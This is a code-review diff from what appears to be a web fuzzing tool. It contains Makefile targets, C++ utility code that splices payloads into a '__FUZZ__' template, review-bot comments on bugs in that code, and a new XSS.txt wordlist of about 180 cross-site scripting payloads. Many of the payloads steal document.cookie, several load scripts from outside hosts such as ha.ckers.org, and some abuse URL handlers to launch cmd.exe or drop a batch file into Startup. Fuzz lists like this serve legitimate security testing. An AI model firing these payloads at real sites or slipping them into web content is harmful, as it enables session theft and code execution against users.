install-info: install-info-am
|
||||
|
||||
install-man:
|
||||
|
||||
install-pdf: install-pdf-am
|
||||
|
||||
install-ps: install-ps-am
|
||||
|
||||
installcheck-am:
|
||||
|
||||
maintainer-clean: maintainer-clean-am
|
||||
-rm -rf ./$(DEPDIR)
|
||||
-rm -f Makefile
|
||||
maintainer-clean-am: distclean-am maintainer-clean-generic
|
||||
|
||||
mostlyclean: mostlyclean-am
|
||||
|
||||
mostlyclean-am: mostlyclean-compile mostlyclean-generic
|
||||
|
||||
pdf: pdf-am
|
||||
|
||||
pdf-am:
|
||||
|
||||
ps: ps-am
|
||||
|
||||
ps-am:
|
||||
|
||||
uninstall-am: uninstall-binPROGRAMS
|
||||
|
||||
.MAKE: install-am install-strip
|
||||
|
||||
.PHONY: CTAGS GTAGS all all-am check check-am clean clean-binPROGRAMS \
|
||||
clean-generic ctags distclean distclean-compile \
|
||||
distclean-generic distclean-hdr distclean-tags distdir dvi \
|
||||
dvi-am html html-am info info-am install install-am \
|
||||
install-binPROGRAMS install-data install-data-am install-dvi \
|
||||
install-dvi-am install-exec install-exec-am install-html \
|
||||
install-html-am install-info install-info-am install-man \
|
||||
install-pdf install-pdf-am install-ps install-ps-am \
|
||||
install-strip installcheck installcheck-am installdirs \
|
||||
maintainer-clean maintainer-clean-generic mostlyclean \
|
||||
mostlyclean-compile mostlyclean-generic pdf pdf-am ps ps-am \
|
||||
tags uninstall uninstall-am uninstall-binPROGRAMS
|
||||
|
||||
# Tell versions [3.59,3.63) of GNU make to not export all variables.
|
||||
# Otherwise a system limit (for SysV at least) may be exceeded.
|
||||
.NOEXPORT:
|
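--- a/src/src/Utils.cpp
+++ b/src/src/Utils.cpp
@@ -0,0 +1,154 @@
+#include "Utils.h"
+void Utils::hexdump(void *mem, unsigned int len)
+{
+unsigned int i, j;
+
+for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++)
+{
+/* print offset */
+if(i % HEXDUMP_COLS == 0)
+{
+fprintf(stdout,"0x%06x: ", i);
+}
+
+/* print hex data */
+if(i < len)
+{
+fprintf(stdout,"%02x ", 0xFF & ((char*)mem)[i]);
+}
+else /* end of block, just aligning for ASCII dump */
+{
+fprintf(stdout," ");
+}
+
+/* print ASCII dump */
+if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1))
+{
+for(j = i - (HEXDUMP_COLS - 1); j <= i; j++)
+{
+if(j >= len) /* end of block, not really printing */
+{
+putchar(' ');
+}
+else if(isprint(((char*)mem)[j])) /* printable char */
+{
+putchar(0xFF & ((char*)mem)[j]);
+}
+else /* other char */
+{
+putchar('.');
+}
+}
+putchar('\n');
+}
+}
+}
+
+std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
+{
+stringstream ss;
+string str;
+std::vector<char> result_vector;
+
+ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
+str=ss.str();
+
+for(int i=0; i<str.length();i++)
+result_vector.push_back(str[i]);
+
+result_vector.insert(result_vector.end(),payload.begin(),payload.end());
+
+ss.str("");
+ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
+
+str=ss.str();
+
+for(int i=0; i<str.length();i++)
+result_vector.push_back(str[i]);
+
+return result_vector;
+}
+
+std::vector<char> Utils::str2vector( std::string& s)
+{
+std::vector<char> result_vector;
+
+for(int i=0; i<s.length();i++)
+result_vector.push_back(s[i]);
+
+return result_vector;
+
+
+}
+int Utils::isNumeric (const char * s)
+{
+if (s == NULL || *s == '\0' || isspace(*s))
+return 0;
+char * p;
+strtod(s, &p);
+return *p == '\0';
+}
+
+
+std::vector<char> Utils::unescape(std::vector<char> & s)
+{
+std::vector<char> res;
+vector<char>::const_iterator it = s.begin();
+while (it != s.end())
+{
+char c = *it++;
+if (c == '\\' && it != s.end())
+{
+switch (*it++) {
+case 'n': c = '\n'; break;
+case 'r': c = '\r'; break;
+case 't': c = '\t'; break;
+
+// all other escapes
+default:
+// invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
+continue;
+}
+}
+res.push_back(c);
+}
+
+return res;
+}
+
+
+char * Utils::get_substring_value(char* str)
+{
+int i=0;
+int soffset=-1,eoffset=-1;
+for(i;i<strlen(str);i++)
+{
+if(str[i]=='"')
+{
+
+if(soffset==-1)
+soffset=i;
+else if(eoffset==-1)
+{
+eoffset=i;
+break;
+}
+else
+{
+fprintf(stdout,"Error in configuration file1");
+exit(1);
+}
+}
+}
+
+if(soffset==-1 || eoffset==-1)
+{
+fprintf(stdout,"Error in configuration file2");
+exit(1);
+}
+
+char *substr=(char*)malloc(eoffset-soffset);
+memset(substr,0,eoffset-soffset);
+memcpy(substr,str+soffset+1,eoffset-soffset-1);
+return substr;
+}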
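Review bot: `Utils::wrapNMAP` never checks the result of `wrapper.find("__FUZZ__")`, so a wrapper string without the marker goes wrong in both halves. The first `substr(0, npos)` copies the whole wrapper, and `npos + strlen("__FUZZ__")` wraps around to offset 7, so the second `substr` either appends the wrapper again from that offset or throws `std::out_of_range` when the wrapper is shorter than 7 characters. Look the marker up once and handle its absence explicitly, e.g. `const std::string::size_type pos = wrapper.find("__FUZZ__");` followed by `if (pos == std::string::npos) return payload;` — the right fallback depends on the caller, which is not visible here. Separately, in `hexdump` the call `isprint(((char*)mem)[j])` passes a plain `char`, which is undefined for bytes above 0x7f where `char` is signed; `isprint((unsigned char)((char*)mem)[j])` avoids that.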
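--- a/src/src/Utils.h
+++ b/src/src/Utils.h
@@ -0,0 +1,40 @@
+#ifndef UTILS_H
+#define UTILS_H
+
+
+#include <stdio.h>
+#include <ctype.h>
+#include <stdlib.h>
+#include <openssl/aes.h>
+#include <openssl/evp.h>
+#include <string.h>
+#include <string>
+#include <sstream>
+#include <iostream>
+#include <vector>
+
+
+#ifndef HEXDUMP_COLS
+#define HEXDUMP_COLS 16
+#endif
+
+
+using namespace std;
+
+class Utils {
+
+public:
+
+static void hexdump(void *mem, unsigned int len);
+static int isNumeric (const char * s);
+static char* get_substring_value(char* str);
+static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
+static std::vector<char> unescape( std::vector<char>& s);
+static std::vector<char> str2vector( std::string& s);
+
+
+};
+
+
+#endif
+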
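Review bot: `using namespace std;` at file scope in this header leaks into every translation unit that includes `Utils.h`. Most declarations here already spell `std::vector` and `std::string`, so qualifying the `string wrapper` parameter of `wrapNMAP` and dropping the directive would do; Utils.cpp in this commit uses unqualified `string`, `stringstream` and `vector`, so those names would need qualifying there as well. `<openssl/aes.h>` and `<openssl/evp.h>` are included although none of the six declarations mentions an OpenSSL type, so the header appears to pull in a build dependency it does not need. `get_substring_value` hands back a buffer that Utils.cpp allocates with `malloc`, and a comment on the declaration such as `// returns a malloc()ed copy; caller must free()` would make the ownership visible.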
188
src/src/XSS.txt
Normal file
188
src/src/XSS.txt
Normal file
@ -0,0 +1,188 @@
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||
' onmouseover=alert(/Black.Spook/)
|
||||
"><iframe%20src="http://google.com"%%203E
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
||||
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
<a href="javascript:\u0061le%72t(1)"><button>
|
||||
<div onmouseover='alert(1)'>DIV</div>
|
||||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||
<%<!--'%><script>alert(1);</script -->
|
||||
<script src="data:text/javascript,alert(1)"></script>
|
||||
<iframe/src \/\/onload = prompt(1)
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<svg/onload=alert(1)
|
||||
<input value=<><iframe/src=javascript:confirm(1)
|
||||
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||
http://www.<script>alert(1)</script .com
|
||||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||
<svg><script ?>alert(1)
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
<img src=`xx:xx`onerror=alert(1)>
|
||||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||
<object data=javascript:\u0061le%72t(1)>
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<body/onload=<!-->
alert(1)>
|
||||
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||
<svg><script>//
confirm(1);</script </svg>
|
||||
<svg><script onlypossibleinopera:-)> alert(1)
|
||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
<script x> alert(1) </script 1=2
|
||||
<div/onmouseover='alert(1)'> style="x:">
|
||||
<--`<img/src=` onerror=alert(1)> --!>
|
||||
<script/src=data:text/javascript,alert(1)></script> ?
|
||||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||
<form><button formaction=javascript:alert(1)>CLICKME
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||
"><img src=x onerror=prompt(1);>
|
||||
# credit to rsnake
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
